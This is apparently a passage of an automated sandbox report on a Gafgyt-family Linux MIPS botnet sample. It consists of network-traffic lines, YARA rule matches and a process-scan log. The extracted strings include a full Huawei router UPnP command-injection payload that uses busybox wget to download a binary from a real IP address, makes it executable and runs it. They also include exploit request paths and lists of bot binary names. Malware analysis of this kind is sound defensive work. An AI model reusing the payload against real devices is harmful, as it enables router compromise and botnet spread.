            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38248
            Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38396 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41888
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41884
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41886
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41880
            Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41882
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53826
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53824
            Source: unknownNetwork traffic detected: HTTP traffic on port 51790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53828
            Source: unknownNetwork traffic detected: HTTP traffic on port 37852 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38230
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38232
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38234
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53822
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38236
            Source: unknownNetwork traffic detected: HTTP traffic on port 49078 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38238
            Source: unknownNetwork traffic detected: HTTP traffic on port 58312 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53820
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41878
            Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41874
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41876
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41870
            Source: unknownNetwork traffic detected: HTTP traffic on port 54826 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41872
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53836
            Source: unknownNetwork traffic detected: HTTP traffic on port 48546 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54430 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42818 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53834
            Source: unknownNetwork traffic detected: HTTP traffic on port 38384 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53838
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38220
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38222
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38224
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53832
            Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38226
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53830
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38218
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41866
            Source: unknownNetwork traffic detected: HTTP traffic on port 42422 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41868
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41862
            Source: unknownNetwork traffic detected: HTTP traffic on port 36142 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36538 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41864
            Source: unknownNetwork traffic detected: HTTP traffic on port 60254 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41108 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41860
            Source: unknownNetwork traffic detected: HTTP traffic on port 43302 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38170
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38172
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38174
            Source: unknownNetwork traffic detected: HTTP traffic on port 39288 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51144
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38178
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51148
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51146
            Source: unknownNetwork traffic detected: HTTP traffic on port 47642 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51152
            Source: unknownNetwork traffic detected: HTTP traffic on port 36514 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51150
            Source: unknownNetwork traffic detected: HTTP traffic on port 53598 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60626 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33970 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33500 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53116 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36984 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38160
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38162
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38164
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38166
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51156
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38168
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51154
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51158
            Source: unknownNetwork traffic detected: HTTP traffic on port 54442 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51162
            Source: unknownNetwork traffic detected: HTTP traffic on port 57456 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41098 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51160
            Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47630 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38150
            Source: unknownNetwork traffic detected: HTTP traffic on port 33994 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38152
            Source: unknownNetwork traffic detected: HTTP traffic on port 33490 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51166
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38154
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51164
            Source: unknownNetwork traffic detected: HTTP traffic on port 60638 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38156
            Source: unknownNetwork traffic detected: HTTP traffic on port 36972 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38158
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51168
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51170
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51174
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51172
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41792
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41790
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38140
            Source: unknownNetwork traffic detected: HTTP traffic on port 50824 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38142
            Source: unknownNetwork traffic detected: HTTP traffic on port 57444 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41086 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51178
            Source: unknownNetwork traffic detected: HTTP traffic on port 53104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38146
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51176
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38148
            Source: unknownNetwork traffic detected: HTTP traffic on port 43796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51180
            Source: unknownNetwork traffic detected: HTTP traffic on port 49066 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51184
            Source: unknownNetwork traffic detected: HTTP traffic on port 46786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51182
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41788
            Source: unknownNetwork traffic detected: HTTP traffic on port 53562 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41782
            Source: unknownNetwork traffic detected: HTTP traffic on port 54454 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41784
            Source: unknownNetwork traffic detected: HTTP traffic on port 33524 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56576 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51108
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51106
            Source: unknownNetwork traffic detected: HTTP traffic on port 36960 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53768
            Source: unknownNetwork traffic detected: HTTP traffic on port 47678 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44160 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51100
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53760
            Source: unknownNetwork traffic detected: HTTP traffic on port 57420 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51104
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51102
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53770
            Source: unknownNetwork traffic detected: HTTP traffic on port 41074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50848 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43326 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37876 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51118
            Source: unknownNetwork traffic detected: HTTP traffic on port 43760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49054 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53774
            Source: unknownNetwork traffic detected: HTTP traffic on port 33536 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51112
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53772
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51110
            Source: unknownNetwork traffic detected: HTTP traffic on port 39264 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47666 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51116
            Source: unknownNetwork traffic detected: HTTP traffic on port 54466 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53776
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51114
            Source: unknownNetwork traffic detected: HTTP traffic on port 53550 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56564 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56588 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40290 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53780
            Source: unknownNetwork traffic detected: HTTP traffic on port 47208 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60602 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38190
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51128
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38192
            Source: unknownNetwork traffic detected: HTTP traffic on port 41062 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38194
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38196
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51122
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53784
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38198
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51120
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51126
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53788
            Source: unknownNetwork traffic detected: HTTP traffic on port 37888 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51124
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53786
            Source: unknownNetwork traffic detected: HTTP traffic on port 50836 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54008 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53792
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49042 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44172 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33548 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47654 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38180
            Source: unknownNetwork traffic detected: HTTP traffic on port 54478 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38182
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38184
            Source: unknownNetwork traffic detected: HTTP traffic on port 36502 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38186
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38188
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53796
            Source: unknownNetwork traffic detected: HTTP traffic on port 52694 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51134
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51132
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51138
            Source: unknownNetwork traffic detected: HTTP traffic on port 46808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53798
            Source: unknownNetwork traffic detected: HTTP traffic on port 60614 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43314 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51140
            Source: unknownNetwork traffic detected: HTTP traffic on port 43772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39276 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34404 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49030 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52682 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33428 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45040 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56540 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34382 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44218 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40228 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41182 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45904 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41194 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34370 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37406 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45928 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33416 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56552 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40194 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52670 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34416 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40170 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51188
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51186
            Source: unknownNetwork traffic detected: HTTP traffic on port 43206 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51192
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51190
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51196
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51194
            Source: unknownNetwork traffic detected: HTTP traffic on port 39252 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45064 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51198
            Source: unknownNetwork traffic detected: HTTP traffic on port 34428 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53574 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57540 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42892 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43218 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33512 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39168 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39240 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45052 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40182 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45916 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35286 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53586 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44206 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36996 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42880 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41170 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57468 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39156 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42086 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36646 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53466 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37960 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53454 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50956 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36634 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33850 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39144 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53902
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53900
            Source: unknownNetwork traffic detected: HTTP traffic on port 52116 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53906
            Source: unknownNetwork traffic detected: HTTP traffic on port 50932 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53904
            Source: unknownNetwork traffic detected: HTTP traffic on port 36658 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36622 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50968 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47316 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53908
            Source: unknownNetwork traffic detected: HTTP traffic on port 47786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53914
            Source: unknownNetwork traffic detected: HTTP traffic on port 48630 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53912
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53918
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53916
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53910
            Source: unknownNetwork traffic detected: HTTP traffic on port 37972 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56238 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 48654 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47328 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38276 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41936
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41938
            Source: unknownNetwork traffic detected: HTTP traffic on port 50920 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41932

            System Summary

            barindex
            Source: huhu.mips.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: 5517.1.00007f2b14400000.00007f2b1442a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Process Memory Space: huhu.mips.elf PID: 5517, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.180.149.156 -l /tmp/linuxxx -r /huhu.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: Initial sampleString containing 'busybox' found: /bin/busybox
            Source: Initial sampleString containing 'busybox' found: busybox
            Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKskyljne.armskyljne.arm5skyljne.arm6skyljne.arm7skyljne.mipsskyljne.mpslskyljne.x86_64skyljne.sh4<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.180.149.156 -l /tmp/linuxxx -r /huhu.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Source: Initial sampleString containing 'busybox' found: Content-Length: /proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys//bin/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashbot.armbot.arm5bot.arm6bot.arm7bot.mipsbot.mpslbot.x86bot.x86_64bot.ppcbot.sh4bot.m68kskyljne.x86skyljne.ppcboskyljnet.m68ktelnetddropbearropbearencodercundi/var/cundi/system/root/dvr_gui//root/dvr_app//var/tmp//anko-app//data/local/tmp//opt//lib/systemd//usr/lib/systemd/system/system/bin//gm/bin//mnt//home/process//home/helper/home/davinci/z/bin//mnt/mtd//tmp/sqfs//usr/libexec//usr/sbin//z/zbin//usr/bin/usr/lib/openssh/sftp-server/home/POST /goform/set_LimitClient_cfg HTTP/1.1
            Source: Initial sampleString containing 'busybox' found: /proc/proc/%d/cmdlinerwgetcurlbusyboxechocatnanotfptabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ3f
            Source: ELF static info symbol of initial sample.symtab present: no
            Source: huhu.mips.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: 5517.1.00007f2b14400000.00007f2b1442a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: Process Memory Space: huhu.mips.elf PID: 5517, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: classification engineClassification label: mal84.troj.linELF@0/1025@16/0
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/1583/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/2672/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/110/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/111/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/112/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/113/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/234/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/1577/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/114/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/235/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/115/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/116/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/117/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/118/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/119/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/10/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/917/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/11/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/12/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/13/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/14/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/15/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/16/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/17/cmdlineJump to behavior
